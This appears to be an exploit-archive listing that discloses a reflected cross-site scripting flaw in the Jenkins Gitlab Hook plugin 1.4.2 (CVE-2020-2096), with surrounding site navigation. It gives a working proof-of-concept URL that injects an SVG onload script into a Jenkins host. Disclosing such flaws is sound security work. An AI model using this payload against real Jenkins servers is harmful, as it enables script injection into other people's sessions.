Jenkins Gitlab Hook 1.4.2 Cross Site Scripting

Jenkins Gitlab Hook 1.4.2 Cross Site Scripting: Posted Jan 16, 2020; Authored by Ai Ho; Jenkins Gitlab Hook plugin version 1.4.2 suffers from a cross site scripting vulnerability.; tags | exploit, xss; advisories | CVE-2020-2096; SHA-256 | 38931217cabd4d17c01cf04d878ac4d8c49d23973f783f5ba2fd442676454822; Download | Favorite | View

Jenkins Gitlab Hook 1.4.2 Cross Site Scripting

# Exploit Title: Jenkins Gitlab Hook Plugin 1.4.2 - Reflected Cross-Site Scripting
# Exploit Author: Ai Ho
# Vendor Homepage : https://jenkins.io/
# Effective version : Gitlab Hook Plugin 1.4.2 and earlier
# References: https://jenkins.io/security/advisory/2020-01-15/
# CVE: CVE-2020-2096

# PoC:
http://JENKINS_IP/gitlab/build_now%3Csvg/onload=alert(document.domain)%3E

Top Authors In Last 30 Days

Red Hat 244 files
Ubuntu 86 files
Gentoo 31 files
Debian 17 files
tmrswrr 8 files
Sina Kheirkhah 7 files
indoushka 5 files
Rodolfo Tavares 4 files
nu11secur1ty 3 files
bRpsd 3 files

File Archives

Systems

AIX (429)
Apple (2,090)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,082)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,531)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,456)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,351)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,673)
UNIX (9,429)
UnixWare (187)
Windows (6,667)
Other

Jenkins Gitlab Hook 1.4.2 Cross Site Scripting

Jenkins Gitlab Hook 1.4.2 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Jenkins Gitlab Hook 1.4.2 Cross Site Scripting

Share This

Jenkins Gitlab Hook 1.4.2 Cross Site Scripting

File Archive:

July 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems